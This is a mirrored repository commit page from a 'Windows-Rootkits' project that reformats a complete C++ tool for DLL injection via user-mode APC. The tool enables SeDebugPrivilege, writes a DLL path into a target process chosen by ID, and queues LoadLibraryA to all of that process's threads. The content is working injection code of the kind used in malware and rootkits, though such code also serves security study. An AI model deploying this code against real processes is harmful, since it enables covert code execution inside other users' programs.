Mirrors
/
Windows-Rootkits
дзеркало https://github.com/ciyze0101/Windows-Rootkits
6
0
Форк 0
Код Задачі Проєкти Релізи Вікі Активність

update 

update
This commit is contained in:
LycorisGuard 2018-08-14 17:39:28 +08:00
джерело c06a8f852d
коміт c3c17b5bba
2 змінених файлів з 66 додано та 66 видалено
Показати статистику Завантажити патч Завантажити файл різниці Expand all files Collapse all files

10
Inject/UserApcInject/UserAPC/Resource.h
Переглянути файл

@ -3,15 +3,15 @@
// Used by APC.rc
//
#define IDS_APP_TITLE 103
#define IDS_APP_TITLE 103
// 新对象的下一组默认值
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif

122
Inject/UserApcInject/UserAPC/UserAPC.cpp
Переглянути файл

@ -18,121 +18,121 @@ using namespace std;
#define DEF_BUF_SIZE 1024
BOOL AdjustPrivilege();
BOOL InjectModuleToProcessById ( DWORD dwProcessId );
BOOL InjectModuleToProcessById(DWORD dwProcessId);
// 用于存储注入模块DLL的路径全名
char szDllPath[DEF_BUF_SIZE] = {0} ;
int _tmain(int argc, _TCHAR* argv[])
{
// 取得当前工作目录路径
GetCurrentDirectoryA ( DEF_BUF_SIZE, szDllPath ) ;
// 取得当前工作目录路径
GetCurrentDirectoryA(DEF_BUF_SIZE, szDllPath);
// 生成注入模块DLL的路径全名
// 生成注入模块DLL的路径全名
#ifdef _WIN64
strcat ( szDllPath, "\\Dllx64.dll" ) ;
strcat ( szDllPath, "\\Dllx64.dll" ) ;
#else
strcat ( szDllPath, "\\Dllx86.dll" ) ;
strcat ( szDllPath, "\\Dllx86.dll" ) ;
#endif
DWORD dwProcessId = 0 ;
// 接收用户输入的目标进程ID
while ( cout << "请输入目标进程ID" && cin >> dwProcessId && dwProcessId > 0 )
{
BOOL bRet = InjectModuleToProcessById ( dwProcessId ) ;
cout << (bRet ? "注入成功":"注入失败") << endl ;
}
return 0;
DWORD dwProcessId = 0 ;
// 接收用户输入的目标进程ID
while( cout << "请输入目标进程ID" && cin >> dwProcessId && dwProcessId > 0 )
{
BOOL bRet = InjectModuleToProcessById(dwProcessId);
cout << (bRet ? "注入成功":"注入失败") << endl ;
}
return 0;
}
// 使用APC机制向指定ID的进程注入模块
BOOL InjectModuleToProcessById ( DWORD dwProcessId )
BOOL InjectModuleToProcessById(DWORD dwProcessId)
{
SIZE_T dwRet = 0;
SIZE_T dwRet = 0;
BOOL bStatus = FALSE ;
LPVOID lpData = NULL ;
UINT uLen = strlen(szDllPath) + 1;
AdjustPrivilege(); //
AdjustPrivilege(); //
// 打开目标进程
HANDLE hProcess = OpenProcess ( PROCESS_ALL_ACCESS, FALSE, dwProcessId ) ;
if ( hProcess )
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if(hProcess)
{
// 分配空间
lpData = VirtualAllocEx ( hProcess, NULL, uLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE ) ;
lpData = VirtualAllocEx ( hProcess, NULL, uLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if ( lpData )
{
// 写入需要注入的模块路径全名
bStatus = WriteProcessMemory ( hProcess, lpData, szDllPath, uLen, (SIZE_T*)(&dwRet) ) ;
bStatus = WriteProcessMemory(hProcess, lpData, szDllPath, uLen, (SIZE_T*)(&dwRet));
}
CloseHandle ( hProcess ) ;
CloseHandle(hProcess);
}
if ( bStatus == FALSE )
if (bStatus == FALSE)
return FALSE ;
// 创建线程快照
THREADENTRY32 te32 = { sizeof(THREADENTRY32) } ;
HANDLE hThreadSnap = CreateToolhelp32Snapshot ( TH32CS_SNAPTHREAD, 0 ) ;
if ( hThreadSnap == INVALID_HANDLE_VALUE )
THREADENTRY32 te32 = { sizeof(THREADENTRY32) };
HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if(hThreadSnap == INVALID_HANDLE_VALUE)
return FALSE ;
bStatus = FALSE ;
// 枚举所有线程
if ( Thread32First ( hThreadSnap, &te32 ) )
if(Thread32First(hThreadSnap, &te32))
{
do{
// 判断是否目标进程中的线程
if ( te32.th32OwnerProcessID == dwProcessId )
if(te32.th32OwnerProcessID == dwProcessId)
{
// 打开线程
HANDLE hThread = OpenThread ( THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID ) ;
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
if ( hThread )
{
// 向指定线程添加APC
DWORD dwRet1 = QueueUserAPC ( (PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)lpData ) ;
DWORD dwRet1 = QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)lpData);
if ( dwRet1 > 0 )
{
bStatus = TRUE ;
}
CloseHandle ( hThread ) ;
{
bStatus = TRUE ;
}
CloseHandle(hThread);
}
}
}while ( Thread32Next ( hThreadSnap, &te32 ) ) ;
}while(Thread32Next ( hThreadSnap, &te32));
}
CloseHandle ( hThreadSnap ) ;
CloseHandle(hThreadSnap);
return bStatus;
}
BOOL AdjustPrivilege()
{
HANDLE hToken;
TOKEN_PRIVILEGES pTP;
LUID uID;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
printf("OpenProcessToken is Error\n");
return false;
}
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&uID)) //调式
{
printf("LookupPrivilegeValue is Error\n");
return false;
}
pTP.PrivilegeCount = 1;
pTP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
pTP.Privileges[0].Luid = uID;
//在这里我们进行调整权限
if (!AdjustTokenPrivileges(hToken,false,&pTP,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
printf("AdjuestTokenPrivileges is Error\n");
return false;
}
return true;
HANDLE hToken;
TOKEN_PRIVILEGES pTP;
LUID uID;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
printf("OpenProcessToken is Error\n");
return false;
}
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&uID)) //调式
{
printf("LookupPrivilegeValue is Error\n");
return false;
}
pTP.PrivilegeCount = 1;
pTP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
pTP.Privileges[0].Luid = uID;
//在这里我们进行调整权限
if (!AdjustTokenPrivileges(hToken,false,&pTP,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
printf("AdjuestTokenPrivileges is Error\n");
return false;
}
return true;
}